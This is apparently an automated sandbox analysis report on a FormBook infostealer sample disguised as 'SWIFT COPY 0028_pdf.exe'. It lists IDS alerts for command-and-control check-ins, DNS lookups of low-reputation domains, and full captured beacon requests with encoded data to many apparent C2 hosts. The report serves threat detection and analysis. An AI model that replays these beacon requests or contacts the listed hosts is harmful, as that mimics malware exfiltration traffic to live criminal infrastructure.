                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50051 -> 104.21.4.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50047 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50048 -> 104.21.4.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 66.29.137.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50044 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 66.29.137.10:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50038 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50043 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50046 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 172.67.162.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50045 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 66.29.137.10:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50007 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50050 -> 104.21.4.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 43.155.76.124:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 203.161.46.205:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 43.155.76.124:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50034 -> 13.248.169.48:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aziziyeescortg.xyz
                Source: DNS query: www.aiactor.xyz
                Source: DNS query: www.optimismbank.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
                Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00974EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00974EB5
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 07:34:08 GMTserver: Apacheset-cookie: __tad=1732088048.1405750; expires=Sat, 18-Nov-2034 07:34:08 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 d1 64 92 71 13 4c 5a f7 20 4a ce 96 ad 91 ed 4c 9f e2 fc 32 71 e8 77 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 f2 8c c8 f6 da 87 62 9f ab e5 00 53 2d ca 47 4b e9 b3 bb e9 f9 f4 ff da 15 ca 0c 84 a0 fb 04 8c 55 4d 8a ce 0d 1d ff fb 3b 0c 5d 7d 39 72 74 e4 29 86 95 ad b8 d1 10 b0 6b 67 77 a6 5a 5c 5c cf ae d5 fc 1d 9c 80 d1 03 88 69 e3 65 18 d0 ab b5 b2 ad 75 22 be a8 87 15 43 98 58 de ce 86 c5 f3 5a 54 7a 0f 03 57 24 95 f6 ac fe b8 00 63 0d 2e 93 b2 90 d0 38 ac c5 3f e7 37 4c c2 3c 29 3f b6 5a 6d a1 41 87 c3 a0 1a 42 57 e4 92 2f 0e e7 e7 2a c6 8e 6e 8a 0e 89 d3 72 c2 2b bc db e9 bd 88 b9 02 77 be 89 81 07 88 98 28 e2 d9 12 7e dc 7c 15 af 55 7d 1b ee e5 53 62 76 1e 2c 0f 1d 08 7f 85 5f d3 43 7a ee 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 07:34:10 GMTserver: Apacheset-cookie: __tad=1732088050.5135837; expires=Sat, 18-Nov-2034 07:34:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 d1 64 92 71 13 4c 5a f7 20 4a ce 96 ad 91 ed 4c 9f e2 fc 32 71 e8 77 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 f2 8c c8 f6 da 87 62 9f ab e5 00 53 2d ca 47 4b e9 b3 bb e9 f9 f4 ff da 15 ca 0c 84 a0 fb 04 8c 55 4d 8a ce 0d 1d ff fb 3b 0c 5d 7d 39 72 74 e4 29 86 95 ad b8 d1 10 b0 6b 67 77 a6 5a 5c 5c cf ae d5 fc 1d 9c 80 d1 03 88 69 e3 65 18 d0 ab b5 b2 ad 75 22 be a8 87 15 43 98 58 de ce 86 c5 f3 5a 54 7a 0f 03 57 24 95 f6 ac fe b8 00 63 0d 2e 93 b2 90 d0 38 ac c5 3f e7 37 4c c2 3c 29 3f b6 5a 6d a1 41 87 c3 a0 1a 42 57 e4 92 2f 0e e7 e7 2a c6 8e 6e 8a 0e 89 d3 72 c2 2b bc db e9 bd 88 b9 02 77 be 89 81 07 88 98 28 e2 d9 12 7e dc 7c 15 af 55 7d 1b ee e5 53 62 76 1e 2c 0f 1d 08 7f 85 5f d3 43 7a ee 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 07:34:13 GMTserver: Apacheset-cookie: __tad=1732088053.2947419; expires=Sat, 18-Nov-2034 07:34:13 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 d1 64 92 71 13 4c 5a f7 20 4a ce 96 ad 91 ed 4c 9f e2 fc 32 71 e8 77 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 f2 8c c8 f6 da 87 62 9f ab e5 00 53 2d ca 47 4b e9 b3 bb e9 f9 f4 ff da 15 ca 0c 84 a0 fb 04 8c 55 4d 8a ce 0d 1d ff fb 3b 0c 5d 7d 39 72 74 e4 29 86 95 ad b8 d1 10 b0 6b 67 77 a6 5a 5c 5c cf ae d5 fc 1d 9c 80 d1 03 88 69 e3 65 18 d0 ab b5 b2 ad 75 22 be a8 87 15 43 98 58 de ce 86 c5 f3 5a 54 7a 0f 03 57 24 95 f6 ac fe b8 00 63 0d 2e 93 b2 90 d0 38 ac c5 3f e7 37 4c c2 3c 29 3f b6 5a 6d a1 41 87 c3 a0 1a 42 57 e4 92 2f 0e e7 e7 2a c6 8e 6e 8a 0e 89 d3 72 c2 2b bc db e9 bd 88 b9 02 77 be 89 81 07 88 98 28 e2 d9 12 7e dc 7c 15 af 55 7d 1b ee e5 53 62 76 1e 2c 0f 1d 08 7f 85 5f d3 43 7a ee 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz
                Source: global trafficHTTP traffic detected: GET /wbcb/?9xn=fHadNpk8MVax&GR54yHZ8=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K07oOsp/5ysfwWmAOXTj0WnbyU/nOpjct5usIHCkjfDMsHKGZFI= HTTP/1.1Host: www.aziziyeescortg.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax HTTP/1.1Host: www.grandesofertas.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /21k5/?9xn=fHadNpk8MVax&GR54yHZ8=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A7+iBUY3/A2GvnNR6vC/W+DoFDwg0HeJMbxHf0rMeHWrRIOFx4E= HTTP/1.1Host: www.sankan-fukushi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /m7wz/?GR54yHZ8=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhLYFcCcGdRxpuCJbxh795ns7rh5kB8bzkZsIh+aAnGmWaZAVFBY=&9xn=fHadNpk8MVax HTTP/1.1Host: www.conansog.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /80gy/?9xn=fHadNpk8MVax&GR54yHZ8=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sMbIBlgbQh0ui0+zZIwlVcUsfMWllXpvy1Ukuj6D4Ic/01nyaOg= HTTP/1.1Host: www.beythome.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /0kli/?GR54yHZ8=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/AI0vJO7v6wOh3ABnBMRs5EHLHNUVXEXSqZ/A5JpvJLk63zT1cr4=&9xn=fHadNpk8MVax HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /ipd6/?9xn=fHadNpk8MVax&GR54yHZ8=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5uc/jX4WzK3nYbDP1BFL1MIpigvL/S+Ybe5ZZiUbOMV88bEfnEo= HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /hayl/?GR54yHZ8=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKTwX6reWgqWzJPe83oti/Pnp22FBmmdcqVWV2wV/tDaQIoOgzZo=&9xn=fHadNpk8MVax HTTP/1.1Host: www.callyur.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /4pih/?9xn=fHadNpk8MVax&GR54yHZ8=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLPfqxdekucT9Chqzy6Pm+Rnw0xtYs44Mkmek35mpNA+VZaQoqJ0= HTTP/1.1Host: www.housew.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /lmj1/?GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVax HTTP/1.1Host: www.nuy25c9t.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax HTTP/1.1Host: www.madhf.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /0krx/?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax HTTP/1.1Host: www.a1shop.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /g2y0/?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax HTTP/1.1Host: www.aiactor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /arvb/?GR54yHZ8=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//topbf+A00Q8GVm5yCYkyRQ3ElhjsG3EX+N+jW0L22iONcil9J4=&9xn=fHadNpk8MVax HTTP/1.1Host: www.sitioseguro.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /lnyv/?GR54yHZ8=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq0wzcDycBqeORKYOzEG12hWJCinHhVNRLnpziyzgvH+OTjwtfrk=&9xn=fHadNpk8MVax HTTP/1.1Host: www.optimismbank.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVax HTTP/1.1Host: www.nonpressure.beautyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficDNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
                Source: global trafficDNS traffic detected: DNS query: www.sankan-fukushi.info
                Source: global trafficDNS traffic detected: DNS query: www.conansog.shop
                Source: global trafficDNS traffic detected: DNS query: www.beythome.online
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
